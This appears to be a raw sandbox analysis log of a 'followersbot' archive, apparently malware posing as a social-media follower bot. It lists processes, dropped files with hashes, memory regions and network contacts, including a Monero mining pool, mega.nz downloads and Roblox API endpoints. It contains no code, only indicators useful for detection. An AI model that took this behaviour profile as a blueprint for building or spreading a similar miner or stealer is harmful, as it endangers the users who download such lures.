C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5688 -s 280
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.10:443 | bit.ly | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | data-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.96.87.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 11.127.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 15.125.203.66.in-addr.arpa | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | gfs206n460.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs208n207.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs204n309.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs270n460.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs240n124.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs214n200.userstorage.mega.co.nz | udp |
| BE | 94.24.37.128:443 | gfs206n460.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.128:443 | gfs206n460.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.128:443 | gfs206n460.userstorage.mega.co.nz | tcp |
| BE | 94.24.37.128:443 | gfs206n460.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.137:443 | gfs208n207.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.137:443 | gfs208n207.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.137:443 | gfs208n207.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.137:443 | gfs208n207.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.154:443 | gfs204n309.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.154:443 | gfs204n309.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.154:443 | gfs204n309.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.154:443 | gfs204n309.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| SE | 69.30.89.34:443 | gfs240n124.userstorage.mega.co.nz | tcp |
| SE | 69.30.89.34:443 | gfs240n124.userstorage.mega.co.nz | tcp |
| SE | 69.30.89.34:443 | gfs240n124.userstorage.mega.co.nz | tcp |
| SE | 69.30.89.34:443 | gfs240n124.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.112:443 | gfs214n200.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.112:443 | gfs214n200.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.112:443 | gfs214n200.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.112:443 | gfs214n200.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 154.24.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.26.206.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.37.24.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.148.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.89.30.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.27.206.185.in-addr.arpa | udp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| LU | 31.216.148.43:443 | gfs270n460.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.11.108.188:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 146.59.154.106:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 106.154.59.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | users.roblox.com | udp |
| DE | 128.116.44.4:443 | users.roblox.com | tcp |
| US | 8.8.8.8:53 | thumbnails.roblox.com | udp |
| DE | 128.116.44.4:443 | thumbnails.roblox.com | tcp |
| US | 8.8.8.8:53 | 4.44.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| GB | 2.18.190.78:443 | tr.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 78.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| DE | 128.116.44.4:443 | thumbnails.roblox.com | tcp |
| DE | 128.116.44.4:443 | thumbnails.roblox.com | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| GB | 2.18.190.78:443 | tr.rbxcdn.com | tcp |
| DE | 128.116.44.4:443 | thumbnails.roblox.com | tcp |
| DE | 128.116.44.4:443 | thumbnails.roblox.com | tcp |
| US | 8.8.8.8:53 | tr.rbxcdn.com | udp |
| GB | 2.18.190.78:443 | tr.rbxcdn.com | tcp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 78bc0ec5146f28b496567487b9233baf |
| SHA1 | 4b1794d6cbe18501a7745d9559aa91d0cb2a19c1 |
| SHA256 | f5e3afb09ca12cd22dd69c753ea12e85e9bf369df29e2b23e0149e16f946f109 |
| SHA512 | 0561cbabde95e6b949f46deda7389fbe52c87bedeb520b88764f1020d42aa2c06adee63a7d416aad2b85dc332e6b6d2d045185c65ec8c2c60beac1f072ca184a |
\??\pipe\LOCAL\crashpad_4660_OBUELAYIVHZVWVGC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a134f1844e0964bb17172c44ded4030f |
| SHA1 | 853de9d2c79d58138933a0b8cf76738e4b951d7e |
| SHA256 | 50f5a3aaba6fcbddddec498e157e3341f432998c698b96a4181f1c0239176589 |
| SHA512 | c124952f29503922dce11cf04c863966ac31f4445304c1412d584761f90f7964f3a150e32d95c1927442d4fa73549c67757a26d50a9995e14b96787df28f18b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba5c5937c8d342ab147cc52672e5ec5d |
| SHA1 | 56d55d27748f151bf6d2b5441716d10d5a34e186 |
| SHA256 | b01c13253dac9db98abdd7ab625353cbb84e79803b756705203b7d4e1f1ed0f5 |
| SHA512 | 1ff44aa1c55c31c8ce256a07ff691b2c1bb90e0caac67fc35cf704cc94d020db30c3f7aeb9cdda678ae991c222f12d9ca52d8d1f78c59b16e9e50cc931039362 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 9010fe212d7da97a4e9cf63a903ee7a4 |
| SHA1 | 8f124a736d045eea3c50a9597d18c9af8b128e28 |
| SHA256 | c2956b77f9af9f4d79e0198d8a7e0a5b6f880b4d597dfeee25a3f56c05d11834 |
| SHA512 | f763ab3261592107fb19b7d6134c7f4d02e921258b1c72f1e0c69a95ee8ed9cc20498259a279cca9648bbd213a5234b965a9196865d465e1f975ee9242e36326 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | e07a48a67f1d3574c4fe4b0cb48e457b |
| SHA1 | 3897cf01e90a8460b38585d978601eb19350484b |
| SHA256 | c38abf357108c7e44a4db8b47d522b2decdbd2489fb914969864a1620161cd6a |
| SHA512 | fee7fa2d6cc5a0d569cbd31d0d131e903363eb8da36b22492b932725ec9a3f28f20298cc8c999f29a6d0891c085cfbe1f21550f536742d58b202ae21f9044ec8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 790a026f721ef1f9cd064365f2669ef0 |
| SHA1 | dbfce4d68bb936cab00e67bac62c8c3a56db4304 |
| SHA256 | 278329f09bbf2898548cb01ab8ea4f156187f7bcfd5098224048f73324c31926 |
| SHA512 | 1de9c6fd333d4b4c854919a517d80d3253c946c718e9fe684cb746da692e73e48258fa15437437fc2d02f0a7970f745b0e4c7f0d84e54b6b50fe15e15df20f14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 745b3b26d878f235aea9f78d9d2f6486 |
| SHA1 | 8b19482427ac25c427cfbc5aafd5bb6cde76adfc |
| SHA256 | 9439e5d13ab16ea6b36d6e648a30b05dc5201aab8cc9304848a77a00359fb1e2 |
| SHA512 | 855e4aa314546187fef216ac8bde512c2f6d4074cb347d8533eed394c922b78f083ae27e9e02fc8129438146308c31c6cd67787d0ea881cac607fc1dca405685 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 309a809052ac1575e72b6ed042b92fff |
| SHA1 | 973e5c7bbbf43ed48e14879dfe8e8643a9069a97 |
| SHA256 | 9052239b22ee36fccb80d48a6a14fddf58b8e61d85b107d57dc239fbac6bfc7e |
| SHA512 | cb251ef77773c097a13cfdaa069f95e36ba138d3f43911a013089d57ef1ed389090b879f679c20839db4b1021729d68455d5eb9ab516052a4325d9e5f84207e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 21320325bdfc20c6f4e4d136228fc9c5 |
| SHA1 | 7e96950811d7ddbc1daeb7341ddb9768980bf2b5 |
| SHA256 | 5e7ac2b978206a07d8b1841a2bd89eae4b466bcd8a0df3a62ae2ca0439b8bd5e |
| SHA512 | ee78316d5b8edffdc83e3431bdbd28ae05a481d2a445ddf3b7c58bf0f01c6c42aead46a4d91e7fc75519a5ca8a7e2bab78749d88476c7a2fa0a25e8b3592bd43 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\Downloads\followersbot.rar
| MD5 | c814222224a59b504d14638e5e7b6db1 |
| SHA1 | 9c4abc0101a9b1550d473ec3e1c2283b6d9dc6c2 |
| SHA256 | 5dc2f1140e1e51fd9ab9fac58d7a8f769b64035d730f359dd7f538b8d00f2e42 |
| SHA512 | 302382418b2e43add39e7be14f5ef70fc9313337b95a17eee6b368abd08756627875b75a0140e3ab7bdf2d6ac45f34ede07c87e3b7fb9b93275327fe8222aa78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2e9fbc807515ad895c5180005d29b362 |
| SHA1 | f342ea1993ab42107fb4829a094734276d81b62a |
| SHA256 | d0d7281a9eb763bda85c9e71e4973176ab17c4fb3ecba0b095df7e124e9c502f |
| SHA512 | ae1611224aa2c5daa45004c9db3e2e39e05fb4681e56b854b7d102ee9703b07e4027981c4ac4b000866f565616eac850c327001e1be9582b15de8ec2c55e9531 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4067909072f20507fae026eb473dfba6 |
| SHA1 | 5e22d41172315c00fcad9bfe6112685e133088de |
| SHA256 | f81c5542cec4ab5776067f9397e16d617a531b2891a2c8ea0f27d2d071026173 |
| SHA512 | 081e5afa4a198f4cc76c9e473b9ff9672889943c2b53e4afca1ae933c14fc8a83abdb342bd5bc7e0359b52b13d834862922b077e319e146ea51ca418156e58fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 80e44615768b008433666037c3414180 |
| SHA1 | c175ff6d7ae33c0ffd8888832b5c398980b569d6 |
| SHA256 | c2c7d64c2e3de9e05fa820cf7aff87218881664067406e2614319a9a2b9e62ba |
| SHA512 | 9a9a89bc048f9f36de0ce1cc4794565e1c79ae4244248bbbee56c67bd39a3594d9d474d506545d61a0f5c6cf79d2368ce9ba58f8ed1fdc63047a39c24cd528e6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe581e8f.TMP
| MD5 | f13ccb1555f7b2cf66e98a0d99d7bcf4 |
| SHA1 | c52c01c6a8d2206d00e45f89a6d53bf54cdac401 |
| SHA256 | b0a4edf312f1bc70fd4cbb839837c0e11232e4843930e0fe68952d1b351a780e |
| SHA512 | 39c3293beebcbd9da92d676c5525ec8069dec89c8a2f7207ae7e1548f6afdd747c5715dec55ddddc997f86c9a6f7f1ff21062ec7f53e2c324c9561f1de07b335 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7e6a13d28b1be1e28140ea15f3ad06fb |
| SHA1 | a3644c64eb5d2888718638d6fff8968cabdeaa8e |
| SHA256 | 55f954bf0ea970d811eee10fc61b79490902c7870e4afcd13bbad2275625a0e3 |
| SHA512 | 27621940ea0446ca6b2bf4a9e46bb057d9118d3d9146607faa7c0c360cea07c263e76094252e4ee4cde10ccb5cacd04418c22b14f0a4221f97173e6c5871cfb1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fe7a37a3e2f70c75e4179893f299c91f |
| SHA1 | 0b87dc2e5f277e0182dae31941c4e0d2d4a7d291 |
| SHA256 | 6c27629445737e9ab192ef5a47e0315f3549c669a3afa320bf111524123bac98 |
| SHA512 | cd6c80f52330e9c981f24feedf70fd8d7f8c3b3b1dc234c13e415b8777fdbcc6cf64a1baa24025aebcd1c7d51390b30928a6bd69a4edbcd31ab4e5dcf7cdbb22 |
C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat
| MD5 | e9b3fc35d83a8ccd63029231ffacd8c1 |
| SHA1 | f7ef1e3ca8141a0b75a7448b8c81b34d24313fe4 |
| SHA256 | 5cb4af357d6ce0ed884623d3d63c6423991a3a36370c55f5e907493a6ece2e2c |
| SHA512 | 156c3790c0b974dad7e71744a1b2791b71eb3eaa65a918bf8638f224901f6f284f71b4dbfcad3f301cc54cd7e19dd8cc8be0b0cb7730072a46c1e318f133964d |
C:\Users\Admin\Downloads\followersbot\9SHCODL.exe
| MD5 | 24220a523e23833de9f004e547b96699 |
| SHA1 | f6f2d8973f57d216949962499c1ef1c85f21a1cb |
| SHA256 | cc15d14f848e1fc20855f75d6bd07b3c1e2f9bc6d0e4d28833312358e5ac9d78 |
| SHA512 | e5652171b5f850c80672fdb3e3390a84f7388ace67c412072800bff57191e1816834c63e0263a12e1c9b91243ea3fefe416d4bde690a9ea9d43fb1bf83339b7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 120cfc451488c658f0a0e8ba54fc8778 |
| SHA1 | 78d69ec0fa2cbd2c62b38ee4f6a863a3da6373a2 |
| SHA256 | cf7c4df93e5a5e4e313da00103a17ca475a1de16fb55108fef5ee830e3a3e070 |
| SHA512 | cbdf0c769565bc2bf3d2a8b6434e9d5524d5edd6974c06a389a650772ce9316ab23fd4461e8db835885598dfcfbded9e42c43438075cfbaa21f3891845745cf2 |
memory/6108-570-0x0000021F69CE0000-0x0000021F69D02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e31trrxv.nop.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5532-582-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5532-585-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5532-587-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5532-584-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5532-583-0x0000000140000000-0x000000014002B000-memory.dmp
memory/5696-618-0x0000018563690000-0x00000185636AC000-memory.dmp
memory/5696-619-0x00000185636B0000-0x0000018563765000-memory.dmp
memory/5696-620-0x0000018563680000-0x000001856368A000-memory.dmp
memory/6104-629-0x0000000140000000-0x000000014000E000-memory.dmp
memory/6104-632-0x0000000140000000-0x000000014000E000-memory.dmp
memory/760-636-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-649-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-642-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-648-0x0000000140000000-0x0000000140835000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 6db666b8eea8c87bb44fc342dbda5fcb |
| SHA1 | 2536fb957e13fd2144e482970707286ca2625816 |
| SHA256 | 079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438 |
| SHA512 | 88fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e |
memory/1784-652-0x00007FF9B61F0000-0x00007FF9B63E8000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a4fe0be11fb007b21a2fafa6abe0bf6f |
| SHA1 | d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a |
| SHA256 | ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2 |
| SHA512 | 1c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0 |
memory/1784-662-0x00007FF9B5CB0000-0x00007FF9B5D6D000-memory.dmp
memory/1784-650-0x00000164AC310000-0x00000164AC33A000-memory.dmp
memory/760-647-0x0000000140000000-0x0000000140835000-memory.dmp
memory/5368-667-0x0000000140000000-0x0000000140008000-memory.dmp
memory/5368-671-0x00007FF9B5CB0000-0x00007FF9B5D6D000-memory.dmp
memory/5368-670-0x00007FF9B61F0000-0x00007FF9B63E8000-memory.dmp
memory/5368-669-0x0000000140000000-0x0000000140008000-memory.dmp
memory/5368-673-0x0000000140000000-0x0000000140008000-memory.dmp
memory/676-689-0x0000019F9C800000-0x0000019F9C82B000-memory.dmp
memory/600-685-0x00007FF976270000-0x00007FF976280000-memory.dmp
memory/600-684-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp
memory/600-678-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp
memory/600-677-0x000001C6ED7E0000-0x000001C6ED80B000-memory.dmp
memory/600-676-0x000001C6ED7B0000-0x000001C6ED7D5000-memory.dmp
memory/5368-666-0x0000000140000000-0x0000000140008000-memory.dmp
memory/5368-665-0x0000000140000000-0x0000000140008000-memory.dmp
memory/5368-664-0x0000000140000000-0x0000000140008000-memory.dmp
memory/760-643-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-644-0x0000020B08390000-0x0000020B083B0000-memory.dmp
memory/760-641-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-639-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-646-0x0000000140000000-0x0000000140835000-memory.dmp
memory/760-645-0x0000000140000000-0x0000000140835000-memory.dmp
memory/6104-638-0x0000000140000000-0x000000014000E000-memory.dmp
memory/760-640-0x0000000140000000-0x0000000140835000-memory.dmp
memory/6104-631-0x0000000140000000-0x000000014000E000-memory.dmp
memory/6104-630-0x0000000140000000-0x000000014000E000-memory.dmp
memory/760-637-0x0000000140000000-0x0000000140835000-memory.dmp
memory/6104-628-0x0000000140000000-0x000000014000E000-memory.dmp
C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe
| MD5 | b91f955810b958a7f434fbc0d443c31f |
| SHA1 | b2a89e5b6f75d48378f157fcd4be0d3da124e07b |
| SHA256 | 95f22f8d46189918f352d72345fcb79ade23209f547cdaaf61b3fda15e3a0930 |
| SHA512 | 136ef7cc91e222e9aecc45d02937c282d415d5283f3a623c9df414d8000f002b4e472df03aec1bebdff196ceb068586a94edeb1109f0f1cc0b92bb5caf7d1e36 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\libffi-7.dll
| MD5 | eef7981412be8ea459064d3090f4b3aa |
| SHA1 | c60da4830ce27afc234b3c3014c583f7f0a5a925 |
| SHA256 | f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081 |
| SHA512 | dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\pyexpat.pyd
| MD5 | 4cb923b0d757fe2aceebf378949a50e7 |
| SHA1 | 688bbbae6253f0941d52faa92dedd4af6f1dfc3b |
| SHA256 | e41cff213307b232e745d9065d057bcf36508f3a7150c877359800f2c5f97cfc |
| SHA512 | 9e88542d07bd91202fcf13b7d8c3a2bbd3d78e60985b45f4fa76c6cd2a2abdee2a0487990bea0713f2ad2a762f120411c3fbbfaa71ef040774512da8f6328047 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\pythoncom310.dll
| MD5 | 020b1a47ce0b55ac69a023ed4b62e3f9 |
| SHA1 | aa2a0e793f97ca60a38e92c01825a22936628038 |
| SHA256 | 863a72a5c93eebaa223834bc6482e5465379a095a3a3b34b0ad44dc7b3666112 |
| SHA512 | b131e07de24d90a3c35c6fa2957b4fe72d62b1434c3941ad5140fb1323aacba0ec41732dac4f524dc2f492b98868b54adc97b4200aa03ff2ba17dd60baea5a70 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\tk86t.dll
| MD5 | 4b6270a72579b38c1cc83f240fb08360 |
| SHA1 | 1a161a014f57fe8aa2fadaab7bc4f9faaac368de |
| SHA256 | cd2f60075064dfc2e65c88b239a970cb4bd07cb3eec7cc26fb1bf978d4356b08 |
| SHA512 | 0c81434d8c205892bba8a4c93ff8fc011fb8cfb72cfec172cf69093651b86fd9837050bd0636315840290b28af83e557f2205a03e5c344239356874fce0c72b9 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\libcrypto-1_1.dll
| MD5 | ab01c808bed8164133e5279595437d3d |
| SHA1 | 0f512756a8db22576ec2e20cf0cafec7786fb12b |
| SHA256 | 9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55 |
| SHA512 | 4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\_ssl.pyd
| MD5 | 80f2475d92ad805439d92cba6e657215 |
| SHA1 | 20aa5f43ca83b3ff07e38b00d5fbd0cf3d7dbbab |
| SHA256 | 41278e309382c79356c1a4daf6dbb5819441d0c6e64981d031cda077bb6f1f79 |
| SHA512 | 618cd6ca973a0b04159a7c83f1f0cda5db126a807982983fea68f343c21e606a3cdb60b95a2b07f4d9379149d844755b9767fea0a64dd1d4451ab894a1f865b5 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\tcl\encoding\cp1252.enc
| MD5 | e9117326c06fee02c478027cb625c7d8 |
| SHA1 | 2ed4092d573289925a5b71625cf43cc82b901daf |
| SHA256 | 741859cf238c3a63bbb20ec6ed51e46451372bb221cfff438297d261d0561c2e |
| SHA512 | d0a39bc41adc32f2f20b1a0ebad33bf48dfa6ed5cc1d8f92700cdd431db6c794c09d9f08bb5709b394acf54116c3a1e060e2abcc6b503e1501f8364d3eebcd52 |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\tcl86t.dll
| MD5 | 75909678c6a79ca2ca780a1ceb00232e |
| SHA1 | 39ddbeb1c288335abe910a5011d7034345425f7d |
| SHA256 | fbfd065f861ec0a90dd513bc209c56bbc23c54d2839964a0ec2df95848af7860 |
| SHA512 | 91689413826d3b2e13fc7f579a71b676547bc4c06d2bb100b4168def12ab09b65359d1612b31a15d21cb55147bbab4934e6711351a0440c1533fb94fe53313bf |
C:\Users\Admin\AppData\Local\Temp\_MEI60282\_tkinter.pyd
| MD5 | 5954a0102a4c2e6e0f71ceb2f6259fc9 |
| SHA1 | 99b96da37baee75f0ab2d2165c8f194f26aa2041 |
| SHA256 | 3ddcdec7a7a9b01f1af5a57f3cd66ae68883416fa7fb6aa7fa51b9cf1c24bf07 |
